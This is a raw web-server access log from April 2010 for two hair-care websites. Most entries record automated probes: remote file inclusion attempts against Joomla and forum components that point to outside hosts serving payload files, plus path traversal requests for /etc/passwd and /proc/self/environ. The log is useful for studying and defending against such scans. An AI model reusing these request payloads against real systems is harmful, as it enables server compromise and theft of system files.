212.94.64.154 - - [25/Apr/2010:21:05:56 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:05:56 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:05:56 -0700] "GET /logs/access.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [25/Apr/2010:21:06:03 -0700] "GET /logs/access_100412.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:21:07:29 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:21:12:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
122.201.73.182 - - [25/Apr/2010:21:19:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.201.73.182 - - [25/Apr/2010:21:19:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
122.201.73.182 - - [25/Apr/2010:21:19:44 -0700] "GET /logs/access_091012.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:24:45 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:24:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:24:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:24:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:24:56 -0700] "GET /logs/access_091012.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [25/Apr/2010:21:25:11 -0700] "GET /logs/access_091012.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [25/Apr/2010:21:30:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "growlonghairfast.com"
91.212.226.240 - - [25/Apr/2010:21:30:25 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "growlonghairfast.com"
66.59.48.68 - - [25/Apr/2010:21:30:53 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [25/Apr/2010:21:30:53 -0700] "GET /logs/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [25/Apr/2010:21:30:53 -0700] "GET /logs/access_100412.log%20%20/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.52 - - [25/Apr/2010:21:32:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5577 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
66.252.224.4 - - [25/Apr/2010:21:38:09 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:38:09 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:21:38:09 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:21:40:58 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.212.226.240 - - [25/Apr/2010:21:41:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "freehairsecrets.com"
91.212.226.240 - - [25/Apr/2010:21:41:03 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "freehairsecrets.com"
212.94.64.154 - - [25/Apr/2010:21:41:20 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:41:20 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:41:20 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:41:25 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:41:25 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:21:41:25 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:42:54 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:42:54 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:42:54 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:43:02 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:43:02 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:21:43:02 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:21:45:41 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 2946869 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
64.251.10.117 - - [25/Apr/2010:21:46:12 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [25/Apr/2010:21:46:12 -0700] "GET /logs/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [25/Apr/2010:21:46:12 -0700] "GET /logs/access_100412.log%20%20/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [25/Apr/2010:21:47:46 -0700] "GET /logs/access_100412.log/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [25/Apr/2010:21:48:59 -0700] "GET /logs/access_100405.log/components/com_flyspray/startdown.php?file=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.63.238 - - [25/Apr/2010:21:54:29 -0700] "GET /index.php?option=com_extcalendar&controller=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.63.238 - - [25/Apr/2010:21:54:29 -0700] "GET /logs/index.php?option=com_extcalendar&controller=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.63.238 - - [25/Apr/2010:21:54:29 -0700] "GET /logs/access_100419.log%20%20/index.php?option=com_extcalendar&controller=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [25/Apr/2010:21:55:57 -0700] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [25/Apr/2010:21:55:57 -0700] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.241.24.100 - - [25/Apr/2010:21:55:57 -0700] "GET /logs/access_091012.log//com_virtuemart/export.php?mosConfig.absolute.path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.63.238 - - [25/Apr/2010:21:57:43 -0700] "GET /logs/access_100412.log%20%20/index.php?option=com_extcalendar&controller=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /logs/access_100301.log//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /logs/access_100301.log//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [25/Apr/2010:22:00:01 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [25/Apr/2010:22:00:43 -0700] "GET /logs/access_100301.log//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [25/Apr/2010:22:00:43 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [25/Apr/2010:22:00:43 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:04:19 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:04:19 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:04:19 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.63.238 - - [25/Apr/2010:22:05:15 -0700] "GET /logs/access_100419.log/index.php?option=com_extcalendar&controller=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.191.40.17 - - [25/Apr/2010:22:05:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "growlonghairfast.com"
195.191.40.17 - - [25/Apr/2010:22:05:55 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:29 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:29 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:29 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:30 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:30 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:08:30 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:22:09:06 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
202.72.242.242 - - [25/Apr/2010:22:10:06 -0700] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:13:19 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:13:19 -0700] "GET /logs/access_100308.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:13:19 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:13:19 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.72.242.242 - - [25/Apr/2010:22:14:31 -0700] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
202.72.242.242 - - [25/Apr/2010:22:14:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
78.110.50.139 - - [25/Apr/2010:22:17:21 -0700] "GET /logs/access_100308.log/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:21 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:22 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:22 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:39 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:39 -0700] "GET /logs/access_100308.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:39 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:17:39 -0700] "GET /logs/access_100315.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:18:10 -0700] "GET /logs/access_100412.log%20%20/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:18:11 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:18:11 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:30 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:30 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:31 -0700] "GET /logs/access_100412.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:36 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:36 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:36 -0700] "GET /logs/access_100412.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:43 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:43 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [25/Apr/2010:22:19:43 -0700] "GET /logs/access_100412.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.witchgrotto.com/files/P1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:19 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:19 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:19 -0700] "GET /logs/access_100412.log%20%20/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:20 -0700] "GET /logs/access_100412.log%20%20/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:20 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [25/Apr/2010:22:20:20 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.21.79.214 - - [25/Apr/2010:22:20:43 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
195.191.40.17 - - [25/Apr/2010:22:22:33 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "freehairsecrets.com"
195.191.40.17 - - [25/Apr/2010:22:22:33 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:24:04 -0700] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:24:04 -0700] "GET /logs//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:24:04 -0700] "GET /include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:24:09 -0700] "GET /logs//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:24:10 -0700] "GET /logs/access_100125.log%20%20//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:24:10 -0700] "GET /include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [25/Apr/2010:22:26:10 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /logs//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /logs//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [25/Apr/2010:22:27:42 -0700] "GET /include/write.php?dir=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.252.224.4 - - [25/Apr/2010:22:30:46 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:30:46 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:30:56 -0700] "GET /logs/access_100308.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [25/Apr/2010:22:31:08 -0700] "GET /logs/access_100412.log/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:22:32:34 -0700] "GET /index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.94.64.154 - - [25/Apr/2010:22:32:34 -0700] "GET /logs/index.php?sayfa=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
